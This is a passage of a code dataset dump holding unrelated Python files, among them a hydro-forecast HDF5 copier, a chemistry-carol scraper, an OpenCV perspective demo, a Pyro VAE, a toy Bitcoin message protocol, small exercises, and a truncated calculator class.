#\n\n\ndef update_local_bins_from_database(model_id, runset_id, timestamp=None, debug_lvl=0):\n \"\"\"\n Reads the data from database and generates binary files for given hydro-forecasts\n :param model_id:\n :param runset_id:\n :param timestamp: If None, retrieves the most recent hydro-forecasts available\n :param debug_lvl:\n :return: None. 
Changes are perform at file system level\n \"\"\"\n\n # basic check\n if model_id is None:\n Debug.dl(\"bingen_hydroforecast_inst_h5: At least a model id must be provided.\", 1, debug_lvl)\n return\n\n # start counting time for debug\n start_time = time.time() if debug_lvl > 0 else None\n\n # define file name\n h5_folder_path = RealtimeFilesMethods.get_folder_with_h5_files(model_id, runset_id)\n h5_file_prefix = RealtimeFilesMethods.get_h5_file_name_prefix(model_id, runset_id)\n\n # define timestamp and basic check\n if timestamp is None:\n the_timestamp = RealtimeFilesMethods.get_current_timestamp_from_hdf5_files(h5_folder_path, h5_file_prefix,\n debug_lvl=debug_lvl)\n else:\n the_timestamp = timestamp\n if the_timestamp is None:\n Debug.dl(\"bingen_hydroforecast_inst_h5: Unable to define a timestamp.\", 1, debug_lvl)\n return\n\n # define file path and try to read it\n hdf5_file_path = os.path.join(h5_folder_path, \"{0}{1}.h5\".format(h5_file_prefix, the_timestamp))\n\n '''\n\n Debug.dl(\"bingen_hydroforecast_inst_h5: Reading file '{0}'.\".format(hdf5_file_path), 1, debug_lvl)\n h5_file_data = get_data_from_hdf5_file(hdf5_file_path, debug_lvl=debug_lvl)\n if h5_file_data[0] is None:\n Debug.dl(\"bingen_hydroforecast_inst_h5: Unable to retrieve hydroforecast for {0} at {1}.\".format(\n model_id, the_timestamp), 1, debug_lvl)\n return None\n\n # process file data\n min_timestamp = None\n count_prints = 0\n max_prints = 10\n ret_dictionary = {}\n last_linkid = h5_file_data[0][0]\n cur_linkid_timeseries = []\n for cur_row in h5_file_data:\n\n cur_linkid = cur_row[0]\n cur_timestamp = int(the_timestamp + (cur_row[1] * 60))\n cur_discharge = cur_row[2]\n\n if cur_linkid != last_linkid:\n ret_dictionary[last_linkid] = cur_linkid_timeseries\n cur_linkid_timeseries = []\n cur_linkid_timeseries.append([cur_timestamp, cur_discharge])\n\n # check timestamp if minimum\n if (min_timestamp is None) or (cur_timestamp < min_timestamp):\n min_timestamp = cur_timestamp\n\n # debug poor\n if count_prints < max_prints:\n count_prints += 1\n\n last_linkid = cur_linkid\n if len(cur_linkid_timeseries) > 0:\n ret_dictionary[last_linkid] = cur_linkid_timeseries\n\n # get reference timestamp and save binary file\n cur_timestamp = min_timestamp if timestamp is None else timestamp\n save_binary_file(model_id, runset_id, cur_timestamp, ret_dictionary, debug_lvl=debug_lvl)\n\n '''\n\n # replace above by the following\n copy_h5_file(hdf5_file_path, runset_id, model_id, \"fq\", the_timestamp, debug_lvl=debug_lvl)\n\n # debug info\n d_time = time.time()-start_time\n Debug.dl(\"bingen_hydroforecast_inst_h5: \"\n \"update_local_bins_from_database({0}) function took {1} seconds.\".format(model_id, d_time), 1, debug_lvl)\n\n return\n\n\ndef get_data_from_hdf5_file(hdf5_file_path, debug_lvl=0):\n \"\"\"\n\n :param hdf5_file_path:\n :param debug_lvl:\n :return:\n \"\"\"\n\n # basic check - file must exist\n if (hdf5_file_path is None) or (not os.path.exists(hdf5_file_path)):\n Debug.dl(\"bingen_states_inst_asynchmodel254_hdf5: File '{0}' does not exist.\".format(hdf5_file_path), 1, debug_lvl)\n return None, None\n\n # import data into matrix\n with h5py.File(hdf5_file_path, 'r') as hdf_file:\n hdf_data = np.array(hdf_file.get('outputs'))\n\n return hdf_data\n\n\ndef save_binary_file(model_id, runset_id, timestamp, hydroforecast_dictionary, debug_lvl=0):\n \"\"\"\n\n :param model_id:\n :param runset_id:\n :param timestamp:\n :param hydroforecast_dictionary:\n :param debug_lvl:\n :return:\n \"\"\"\n\n product_id = \"fq\"\n\n # 
basic check\n if hydroforecast_dictionary is None:\n return\n\n bin_file_path = FolderDefinition.get_intermediate_bin_file_path(model_id, product_id, timestamp,\n runset_id=runset_id)\n\n # create folder if necessary\n bin_folder_path = FolderDefinition.get_intermediate_bin_folder_path(model_id, product_id, runset_id=runset_id)\n if not os.path.exists(bin_folder_path):\n os.makedirs(bin_folder_path)\n\n Debug.dl(\"bingen_hydroforecast_inst_h5: Saving '{0}' file.\".format(bin_file_path), 2, debug_lvl)\n with open(bin_file_path, \"wb\") as w_file:\n pickle.dump(hydroforecast_dictionary, w_file)\n\n Debug.dl(\"bingen_hydroforecast_inst_h5: Binary file saved: '{0}'.\".format(bin_file_path), 1, debug_lvl)\n\n return\n\n\ndef copy_h5_file(h5_file_path, sc_runset_id, sc_model_id, sc_product_id, timestamp, debug_lvl=0):\n \"\"\"\n\n :param h5_file_path:\n :param sc_runset_id:\n :param sc_model_id:\n :param sc_product_id:\n :param timestamp:\n :param debug_lvl:\n :return:\n \"\"\"\n\n dest_file_path = BinaryLibrary.get_binary_file_path(sc_runset_id, sc_model_id, sc_product_id, timestamp,\n debug_lvl=debug_lvl)\n\n shutil.copy(h5_file_path, dest_file_path)\n H5FileReader.create_linkid_index_asynch_hydrograph_h5(dest_file_path, debug_lvl=debug_lvl)\n\n Debug.dl(\"bingen_hydroforecast_inst_h5: Copied file to '{0}'.\".format(dest_file_path), 1, debug_lvl)\n\n\ndef import_hdf_as_sparce_snapshots(h5_file_path, sc_runset_id, sc_model_id, sc_product_id, debug_lvl=0):\n \"\"\"\n\n :param h5_file_path:\n :param sc_runset_id:\n :param sc_model_id:\n :param sc_product_id:\n :param debug_lvl:\n :return:\n \"\"\"\n return None\n\n\n# ####################################################### CALL ####################################################### #\n\nupdate_local_bins_from_database(model_id_arg, runset_id_arg, timestamp_arg, debug_lvl=debug_level_arg)\n","sub_path":"backend/model_3_0_scripts/python/libs/bingen_hydroforecast_inst_h5.py","file_name":"bingen_hydroforecast_inst_h5.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"598371431","text":"from bs4 import BeautifulSoup\nimport requests\n\n\nelementslist = []\nelementswebsite = requests.get(\"https://www.britannica.com/topic/list-of-chemical-elements-2026117\")\nelementswebsitecontent = BeautifulSoup(elementswebsite.content, 'lxml')\nfor element in elementswebsitecontent.find_all(\"li\"):\n elementslist.append(element.text)\n\n# print(elementslist.index(\"actinium (89)\")) used for finding first element index to use\n# print(elementslist.index(\"zirconium (40)\")) used for finding second element index to use\nnewelementslist = []\nfor x in elementslist[13: 131]:\n seperator = \"(\"\n textelement = x.split(seperator, 1)[0]\n\n newelementslist.append(textelement)\nchristmascarolwebsiteandcontent = BeautifulSoup(requests.get(\"http://employees.oneonta.edu/helsertl/ChemXmasCarol.html\").content, 'lxml')\nchristmascaroltext = christmascarolwebsiteandcontent.text\ncounter = 0\nwords = christmascaroltext.split(\" \")\npureelements = newelementslist\nnewelementslist.append(\"ium\")\nnewelementslist.append(\"gen\")\nnewelementslist.append(\"ny\")\nnewelementslist.append(\"er\")\nnewelementslist.append(\"ld\")\nnewelementslist.append(\"ne\")\nchemistryanswers = []\n\nfor word in words:\n for element in newelementslist:\n if element in word and ((word in chemistryanswers) == False):\n chemistryanswers.append(word)\n else:\n pass\nfor x in chemistryanswers:\n 
print(x)\nprint(f\"\"\"\nThe amount of words in the Chemistry Carol Text is {len(words)} but the filtered\namount of words in my list above is {len(chemistryanswers)} but the hw wants you to get 86 words \nso this saved some time. Just use your eyes now and filter through which ones look like or are \nstraight up elements and you're good. \n- Shashi ;)\n \"\"\")\n\n","sub_path":"chemistrychristmascarol.py","file_name":"chemistrychristmascarol.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"343097469","text":"import cv2\nimport numpy as np\n\ndef Select_Pts(event, x, y, flags, param):\n mod_img = param[1].copy()\n if event == cv2.EVENT_LBUTTONDOWN:\n if len(param[0]) < 4:\n param[0].append([x, y])\n print(param[0])\n \n if event == cv2.EVENT_RBUTTONDOWN:\n if len(param[0]) != 0:\n param[0].pop()\n print(param[0])\n for pt in param[0]:\n mod_img = cv2.circle(mod_img, (pt[0], pt[1]), 5, (255, 0, 0), -1)\n cv2.imshow(\"dash\", mod_img)\n\nimg = cv2.imread(\"dashcam.jpg\")\n#img = cv2.resize(img, (int(0.25*img.shape[0]), int(0.25*img.shape[1])))\n\nwidth = img.shape[1]\nheight = img.shape[0]\n\ndst_pts = [\n [0,0],\n [width,0],\n [width, height],\n [0, height]\n]\nsrc_pts = []\n\ncv2.imshow(\"dash\", img)\n\nprint(\"Left click to add point. Right click to remove point.\")\nprint(\"select points going from top left, then proceeding clockwise\")\nprint(\"Press any key to finalize points\")\ncv2.setMouseCallback(\"dash\", Select_Pts, [src_pts, img])\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\ncv2.imshow(\"dash_original\", img)\n\nM = cv2.getPerspectiveTransform(np.array(src_pts, dtype=np.float32),\n np.array(dst_pts, dtype=np.float32))\nwarped_img = cv2.warpPerspective(img, M, (width, height),\n flags=cv2.INTER_LINEAR, \n borderMode=cv2.BORDER_CONSTANT)\n\ncv2.imshow(\"warped\", warped_img)\n\nprint(\"Press any key to exit.\")\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"Simulations/VehicleVisionSim.py","file_name":"VehicleVisionSim.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"284025021","text":"from models.category import Category\nfrom models.productdownload import ProductDownloader\nfrom settings.settings import category_list\n\n\nclass CategoryDownloader:\n \"\"\"Download the categories\"\"\"\n\n def get_category(self):\n \"\"\"Add the categories to the list\"\"\"\n all_category = []\n for category in category_list:\n cat = Category()\n cat.name = category\n get_products = ProductDownloader()\n products = get_products.product_by_category(category)\n cat.products = get_products.filter_product(products)\n all_category.append(cat)\n\n return all_category\n","sub_path":"models/categorydownloader.py","file_name":"categorydownloader.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139739336","text":"#/usr/bin/env python\n#encoding:utf-8\nfrom distutils.version import StrictVersion\nimport json\n\nclass MessageManager:\n\n PROTOCOL_NAME = 'simple_bitcoin_protocol'\n MY_VERSION = '0.1.0'\n\n MSG_ADD = 0\n MSG_REMOVE = 1\n MSG_CORE_LIST = 2\n MSG_REQUEST_CORE_LIST = 3\n MSG_PING = 4\n MSG_ADD_AS_EDGE = 5\n MSG_REMOVE_EDGE = 6\n\n ERR_PROTOCOL_UNMATCH = 0\n ERR_VERSION_UNMATCH = 1\n OK_WITH_PAYLOAD = 2\n OK_WITHOUT_PAYLOAD = 3\n\n def __init__(self):\n print('Initializing 
MessageManager...')\n\n    def build_message(self, msg_type, payload=None):\n\n        message = {\n            'protocol': MessageManager.PROTOCOL_NAME,\n            'version': MessageManager.MY_VERSION,\n            'msg_type': msg_type,\n        }\n\n        if payload is not None:\n            message[\"payload\"] = payload\n\n        return json.dumps(message)\n\n    def parse_message(self, msg):\n\n        msg = json.loads(msg)\n        msg_ver = StrictVersion(msg[\"version\"])\n\n        if msg['protocol'] != MessageManager.PROTOCOL_NAME:\n            return ('error', MessageManager.ERR_PROTOCOL_UNMATCH)\n        elif msg_ver > StrictVersion(MessageManager.MY_VERSION):\n            return ('error', MessageManager.ERR_VERSION_UNMATCH)\n        elif msg['msg_type'] == MessageManager.MSG_CORE_LIST:\n            result_type = MessageManager.OK_WITH_PAYLOAD\n            cmd = msg['msg_type']\n            # build_message does not always include 'my_port', so read it defensively\n            my_port = msg.get('my_port')\n            payload = msg['payload']\n            return ('ok', result_type, cmd, payload)\n        else:\n            result_type = MessageManager.OK_WITHOUT_PAYLOAD\n            cmd = msg['msg_type']\n            my_port = msg.get('my_port')\n            return ('ok', result_type, cmd)\n","sub_path":"SimpleBitcoin/MessageManager.py","file_name":"MessageManager.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"336381272","text":"def analytics(data):\n    totalSum = sum(data)\n    leftSum = 0\n    index = 0\n    length = len(data)\n    if length == 1:\n        return 'YES'\n    while index < length - 1:\n        val = data[index]\n        excl = data[index + 1]\n        leftSum += val\n        rightSum = totalSum - leftSum - excl\n        # print(\"index {}. left {}. ex {}. right {}\".format(index, leftSum, excl, rightSum))\n        if leftSum == rightSum:\n            return 'YES'\n        index += 1\n    return 'NO'\n\n\nif __name__ == '__main__':\n    N = int(input().strip())\n    for test in range(N):\n        int(input().strip())\n        data = list(map(int, input().strip().split(' ')))\n        print(analytics(data))\n","sub_path":"rank/search/sherlokarray/sherlockarray.py","file_name":"sherlockarray.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"479084529","text":"from datetime import datetime\nfrom utils.Dir import Dir\nfrom utils.Text import Text\n\n\nclass DateDomainWriter(object):\n    def __init__(self, domain, base_dump_directory='./raw_data'):\n        self._str_now = (datetime.now().strftime(\"%m_%d_%y\"))\n        self._root_dir = base_dump_directory + '/' + self._str_now + '/' + domain + '/'\n        self._file_counter = 1\n\n        if not Dir.exists(self._root_dir):\n            Dir.create(self._root_dir)\n\n    def write(self, text, extension='.txt', delimiter=None):\n        file_path = self._root_dir + str(self._file_counter) + extension\n\n        Text.write(file_path, text, delimiter)\n\n        self._file_counter += 1\n","sub_path":"src/file_writers/DateDomainWriter.py","file_name":"DateDomainWriter.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"220405311","text":"\"\"\"\nLevando os próprios erros em raise\n\nraise - Lança exceções\n\nOBS: raise não é uma função, é um palavra resevada como o raise\n\nPara simplificar, pense que ele funciona como uma forma de revelar por nós um erro\n\nForma de utilizar:\n\nraise Tipodeerro('Mensage de erro')\n\"\"\"\n\n# # raise ValueError(\"Valor incorreto\")\n#\n# # exemplo real\n# def colore(texto, cor):\n#     if not type(texto) == str:\n#         raise TypeError('Texto precisa ser uma string')\n#     if not type(cor) == str:\n#         raise TypeError('Cor precisa ser uma string')\n#     print(texto, cor)\n\n\n# exemplo real\ndef colore(texto, 
cor):\n cores = ('Azul', 'Verde', 'Amarelo')\n if not type(texto) == str:\n raise TypeError('Texto precisa ser uma string')\n if not type(cor) == str:\n raise TypeError('Cor precisa ser uma string')\n if cor not in cores:\n raise ValueError('Essa cor não existe dentro dos padrões')\n print(texto, cor)\n\n\ncolore('1', 'Roxo')","sub_path":"Cursos Python/Python 3 Básico ao avançado - Geek University/74 - Levando os próprios erros em raise.py","file_name":"74 - Levando os próprios erros em raise.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"593877284","text":"import glob\nimport pickle\nimport cv2\nimport numpy as np\n\n\ndef calibrateCamera():\n # prepare opject points\n nx = 6\n ny = 9\n\n # prepare object points\n objp = np.zeros((nx * ny, 3), np.float32)\n objp[:, :2] = np.mgrid[0:ny, 0:nx].T.reshape(-1, 2)\n\n # Arrays to store object points and image points from all the images.\n objpoints = [] # 3d points in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Make a list of calibration images\n images = glob.glob('./camera_cal/calibration*.jpg')\n\n # Step through the list and search for chessboard corners\n for fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (ny, nx), None)\n\n # If found add object points image points\n if ret:\n print('points found in: ' + fname)\n objpoints.append(objp)\n imgpoints.append(corners)\n\n # Draw corners\n # img = cv2.drawChessboardCorners(img, (ny, nx), corners, ret)\n output_fname = './camera_cal/found/' + fname.split('\\\\')[-1]\n print('Write ChessboardCorners to: ' + output_fname)\n\n img = cv2.imread(images[0])\n img_size = (img.shape[1], img.shape[0])\n # safe the camera calibration matrix and the distorbtion factor to the pickle file\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size, None, None)\n\n dist_pickle = {}\n dist_pickle['mtx'] = mtx\n dist_pickle['dist'] = dist\n pickle.dump(dist_pickle, open(\"./camera_cal/calibration_pickle.p\", \"wb\"))\n\n print('Camera Calibration done!')\n","sub_path":"CameraCalibration.py","file_name":"CameraCalibration.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"144499795","text":"#\n#\t\tPython GUI - Menus - PyObjC\n#\n\nfrom AppKit import NSMenu, NSMenuItem, NSOnState, \\\n\tNSCommandKeyMask, NSShiftKeyMask, NSAlternateKeyMask\nfrom GUI import export\nfrom GUI import Globals\nfrom GUI.GMenus import Menu as GMenu, MenuItem\n\n#_ns_standard_actions = {\n#\t'undo_cmd': 'undo:',\n#\t'redo_cmd': 'redo:',\n#\t'cut_cmd': 'cut:',\n#\t'copy_cmd': 'copy:',\n#\t'paste_cmd': 'paste:',\n#\t'clear_cmd': 'clear:',\n#\t'select_all_cmd': 'selectAll:',\n#}\n\nclass Menu(GMenu):\n\n\tdef __init__(self, title, items, **kwds):\n\t\t#print \"Menu: creating with items\", items ###\n\t\tGMenu.__init__(self, title, items, **kwds)\n\t\tns_menu = NSMenu.alloc().initWithTitle_(title)\n\t\tns_menu.setAutoenablesItems_(False)\n\t\tns_menu.setDelegate_(Globals.ns_application)\n\t\tself._ns_menu = ns_menu\n\t\n\tdef _clear_platform_menu(self):\n\t\tns_menu = self._ns_menu\n\t\tn = ns_menu.numberOfItems()\n\t\twhile n:\n\t\t\tn -= 1\n\t\t\tns_menu.removeItemAtIndex_(n)\n\t\n\tdef _add_separator_to_platform_menu(self):\n\t\tns_item = 
NSMenuItem.separatorItem()\n\t\tself._ns_menu.addItem_(ns_item)\n\t\n\tdef _add_item_to_platform_menu(self, item, name, command = None, index = None):\n\t\tkey = item._key or \"\"\n\t\tif item._shift:\n\t\t\tkey = key.upper()\n\t\telse:\n\t\t\tkey = key.lower()\n\t\tns_item = NSMenuItem.alloc()\n\t\t#ns_action = _ns_standard_actions.get(command, 'menuSelection:')\n\t\tns_action = 'menuSelection:'\n\t\tns_item.initWithTitle_action_keyEquivalent_(name, ns_action, key)\n\t\tns_item.setEnabled_(item.enabled)\n\t\tif item.checked:\n\t\t\tns_item.setState_(NSOnState)\n\t\tns_modifiers = NSCommandKeyMask\n\t\tif item._option:\n\t\t\tns_modifiers |= NSAlternateKeyMask\n\t\tns_item.setKeyEquivalentModifierMask_(ns_modifiers)\n\t\tns_item.setRepresentedObject_(command)\n\t\tif index is not None:\n\t\t\tns_tag = index\n\t\telse:\n\t\t\tns_tag = -1\n\t\tns_item.setTag_(ns_tag)\n\t\tself._ns_menu.addItem_(ns_item)\n\nexport(Menu)\n","sub_path":"GUI/Cocoa/Menu.py","file_name":"Menu.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"526212567","text":"# coding: utf-8\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import log_loss, roc_curve, auc\n\nfrom util import *\n\n\ndef main():\n dtype = {}\n for layer in range(NUM_LAYER):\n for cell in range(NUM_CELL[layer]):\n dtype[\"e{}_{}\".format(layer, cell)] = DTYPE_E\n dtype[\"t{}_{}\".format(layer, cell)] = DTYPE_T\n dtype[\"s{}_{}\".format(layer, cell)] = DTYPE_S\n data = pd.read_csv(abs_path(\"../data/test_set.zip\"), dtype=dtype)\n\n features = ([\"e{}_{}\".format(layer, cell) for layer in range(NUM_LAYER) for cell in range(NUM_CELL[layer])]\n + [\"t{}_{}\".format(layer, cell) for layer in range(NUM_LAYER) for cell in range(NUM_CELL[layer])])\n targets = [\"s{}_{}\".format(layer, cell) for layer in range(NUM_LAYER) for cell in range(NUM_CELL[layer])]\n X = data.loc[:, features].values\n Y = data.loc[:, targets].values\n\n clf = joblib.load(abs_path(\"models/forest_leaf280_full.pkl\"))\n\n Y_pred = clf.predict_proba(X)\n assert Y.shape == Y_pred.shape\n y = Y.reshape((Y.shape[0] * Y.shape[1], ))\n y_pred = Y_pred.reshape((Y_pred.shape[0] * Y_pred.shape[1], ))\n print(\"logloss on test set: {}\".format(log_loss(y, y_pred)))\n\n fpr, tpr, thresholds = roc_curve(y, y_pred)\n roc_auc = auc(fpr, tpr)\n\n print(\"when TPR = {1}, FPR = {0}\".format(*constrained_min_fpr(fpr, tpr, 0.98)))\n print(\"when TPR = {1}, FPR = {0}\".format(*constrained_min_fpr(fpr, tpr, 0.99)))\n\n plt.plot(fpr, tpr, label='auc = {}'.format(roc_auc))\n plt.legend()\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"learning/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"652048271","text":"\n\n# o(n) time o(n) space\n\n\ndef checkPerm(string1, string2):\n if len(string1) != len(string2):\n return False\n\n count = {}\n for letter in string1:\n if letter in count:\n count[letter] += 1\n else:\n count[letter] = 1\n\n for x in string2:\n if x in count:\n count[x] -= 1\n if count[x] < 0:\n return False\n else:\n count[x] = - 1\n if count[x] < 0:\n return False\n\n print(count)\n return True\n\n\nprint(checkPerm(\"hrllo\", 
\"hello\"))\n","sub_path":"Python/stringPerm.py","file_name":"stringPerm.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"174444359","text":"import pt_helper # helper functions for loading data\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport pyro\nfrom torch.utils.data import DataLoader\nimport pyro.distributions as dist\n\n# set up\npyro.enable_validation(True)\npyro.set_rng_seed(0)\n\n\nclass Decoder(nn.Module):\n \"\"\"\n takes latent variables z, passes through two hidden layers and returns reconstructed x.\n \"\"\"\n def __init__(self, alph_size,seq_len, z_dim=30, hidden_architecture=[100,500]):\n super(Decoder, self).__init__()\n # setup the two linear transformations used\n self.hidden1 = nn.Linear(z_dim,hidden_architecture[0])\n self.hidden2 = nn.Linear(hidden_architecture[0],hidden_architecture[1])\n self.final = nn.Linear(hidden_architecture[1],(alph_size*seq_len))\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, z):\n # define the forward computation on the latent z\n hidden1 = self.relu(self.hidden1(z))\n hidden2 = self.sigmoid(self.hidden2(hidden1))\n output = self.sigmoid(self.final(hidden2))\n return output\n\n\nclass Encoder(nn.Module):\n \"\"\"\n Takes in data, returns mu and sigma for variational approximation of latent variable.\n \"\"\"\n def __init__(self,alph_size,seq_len, z_dim=30, hidden_architecture=[1500,1500]):\n super(Encoder, self).__init__()\n self.hidden1 = nn.Linear((alph_size*seq_len),hidden_architecture[0])\n self.hidden2 = nn.Linear(hidden_architecture[0],hidden_architecture[1])\n self.final1 = nn.Linear(hidden_architecture[1],z_dim)\n self.final2 = nn.Linear(hidden_architecture[1],z_dim)\n self.relu = nn.ReLU()\n self.alph_size = alph_size\n self.seq_len = seq_len\n\n def forward(self, x):\n x = x.reshape(-1,self.seq_len*self.alph_size)\n hidden1 = self.relu(self.hidden1(x))\n hidden2 = self.relu(self.hidden2(hidden1))\n z_loc = self.final1(hidden2)\n z_scale = torch.exp(self.final2(hidden2))\n return z_loc, z_scale\n\n\nclass VAE(nn.Module):\n def __init__(self, alph_size, seq_len, z_dim=30, encoder_architecture=[1500, 1500],\n decoder_architecture=[100, 500], use_cuda=False):\n \"\"\"\n Variational Autoencoder that defines the pyro structure of model and guide\n\n :param alph_size: size of alphabet\n :param seq_len: length of sequence\n :param z_dim: dimensions of latent space\n :param encoder_architecture: nodes per layer for encoder\n :param decoder_architecture: nodes per layer for decoder\n :param use_cuda: GPU command\n \"\"\"\n super(VAE, self).__init__()\n # create the encoder and decoder networks\n # call classes shared by nn.Module\n self.encoder = Encoder(alph_size,seq_len,z_dim, encoder_architecture)\n self.decoder = Decoder(alph_size,seq_len,z_dim, decoder_architecture)\n if use_cuda:\n self.cuda()\n # parameters required in functions\n self.use_cuda = use_cuda\n self.z_dim = z_dim\n self.alph_size = alph_size\n self.seq_len = seq_len\n\n # define the model for conditional distribution p(x|z)p(z)\n def model(self, x):\n pyro.module('decoder', self.decoder) # adds decoder as a pyro module\n with pyro.plate('data', x.shape[0]):\n z_loc = x.new_zeros(torch.Size((x.shape[0], self.z_dim)))\n z_scale = x.new_ones(torch.Size((x.shape[0], self.z_dim)))\n z = pyro.sample('latent', dist.Normal(z_loc, z_scale).to_event(1))\n output = self.decoder.forward(z)\n # score against actual images\n 
pyro.sample('obs', dist.Bernoulli(output).to_event(1),\n obs=x.reshape(-1, self.alph_size*self.seq_len))\n\n # define the guide (i.e. variational distribution) q(z|x)\n def guide(self, x):\n pyro.module('encoder', self.encoder)\n with pyro.plate('data', x.shape[0]):\n z_loc, z_scale = self.encoder.forward(x)\n # sample the latent code z\n pyro.sample(\"latent\", dist.Normal(z_loc, z_scale).to_event(1))\n\n def reconstruct_output(self, x):\n z_loc, z_scale = self.encoder(x)\n z = dist.Normal(z_loc, z_scale).sample()\n # decode the image (note not sampled; this is non-bayesian)\n output = self.decoder(z)\n return output\n\n\ndef loader_function(data, bs, nw, pm):\n \"\"\"\n :param data: dataset specification for datahelper\n :param bs: batch size\n :param nw: number of workers for cuda\n :param pm: pin memory for GPU\n :return: a pytorch dataloader, alphabet and sequence size from datahelper\n \"\"\"\n datahelper = pt_helper.DataHelper(dataset=data,calc_weights=True)\n x_train = datahelper.x_train.astype(np.float32)\n alph_size = datahelper.alphabet_size\n seq_len = datahelper.seq_len\n data_loader = DataLoader(x_train,batch_size=bs,\n shuffle=True, num_workers=nw, pin_memory=pm)\n return data_loader, alph_size, seq_len\n\n\ndef train(svi, loader, use_cuda=False):\n \"\"\"\n per epoch training function.\n\n :param svi: pyro svi module\n :param loader: data loader from loader_function\n :param use_cuda: GPU command\n :return: loss for that epoch\n \"\"\"\n epoch_loss = 0.\n for x in loader:\n if use_cuda:\n x = x.cuda()\n epoch_loss += svi.step(x)\n\n normalizer_train = len(loader.dataset)\n total_epoch_loss_train = epoch_loss / normalizer_train\n return total_epoch_loss_train\n\n\n\n","sub_path":"models/pyro_model/pyro_vae.py","file_name":"pyro_vae.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414008707","text":"def triangel_bas_upp(bas,sida):\n \"\"\"Skapar en triangel med basen upp\"\"\"\n counter = 0\n triangel1 = \"\"\n for i in range(bas):\n triangel1 += sida * \" \" + counter * \" \" + bas * \"*\" + \"\\n\"\n bas -= 2\n counter += 1\n return triangel1\nprint(triangel_bas_upp(9,2))\n\n\ndef triangel_bas_ned(bas,sida):\n \"\"\"Skapar en triangel med basen ned\"\"\"\n antal_stjärnor = 1\n counter = bas//2\n triangel2 = \"\"\n for i in range(bas):\n triangel2 += sida * \" \" + counter * \" \" + antal_stjärnor * \"*\" + \"\\n\"\n counter -= 1\n antal_stjärnor += 2\n if counter < 0:\n return triangel2\n\nprint(triangel_bas_ned(7,5))\n\n\ndef romb(avstånd,bredd):\n def triangel_bas_upp(bas,sida):\n \"\"\"Skapar en triangel med basen upp\"\"\"\n counter = 0\n triangel = \"\"\n for i in range(bas):\n triangel += sida * \" \" + counter * \" \" + bas * \"*\" + \"\\n\"\n bas -= 2\n counter += 1\n return triangel\n def triangel_bas_ned(bas,sida):\n \"\"\"Skapar en triangel med basen ned\"\"\"\n antal_stjärnor = 1\n counter = bas//2\n triangel = \"\"\n for i in range(bas):\n triangel += sida * \" \" + counter * \" \" + antal_stjärnor * \"*\" + \"\\n\"\n counter -= 1\n antal_stjärnor += 2\n if counter < 0:\n return triangel\n\n return triangel_bas_ned(bredd, avstånd - 1) + triangel_bas_upp(bredd - 2, avstånd)\n\n\nprint(romb(4,7))","sub_path":"Labb2/Extra uppgift.py","file_name":"Extra uppgift.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"634648639","text":"# -*- coding:utf-8 
-*-\r\n\r\n__author__ = 'AlexZz2'\r\n\r\nimport random\r\n\r\n'''\r\n 实现一个四则运算的类\r\n 要求:实现两个数的加减乘除运算\r\n'''\r\nclass Calc:\r\n # 初始化\r\n def __init__(self, a, b):\r\n if not (isinstance(a, (int, float)) and isinstance(b, (int, float))):\r\n raise TypeError('bad operand type!')\r\n self.a = a\r\n self.b = b\r\n \r\n # 实现加法运算\r\n def add(self):\r\n return self.a+ self.b\r\n\r\n # 实现减法运算\r\n def sub(self):\r\n return self.a- self.b\r\n\r\n # 实现乘法运算\r\n def mul(self):\r\n return self.a* self.b\r\n\r\n # 实现除法运算\r\n def div(self):\r\n try:\r\n return self.a/ self.b\r\n except ZeroDivisionError as e:\r\n print('Division is Zero!')\r\n raise\r\n\r\n'''\r\n 随机生成count个start~end之间的数,并对生成的count个数进行排序\r\n'''\r\nclass MySort:\r\n '''\r\n start, end 随机数范围\r\n count 生成的随机数的个数\r\n '''\r\n def __init__(self, start, end, count):\r\n if not(isinstance(start, (int, float))):\r\n raise TypeError('bad operand type!')\r\n elif not (isinstance(end, (int, float))):\r\n raise 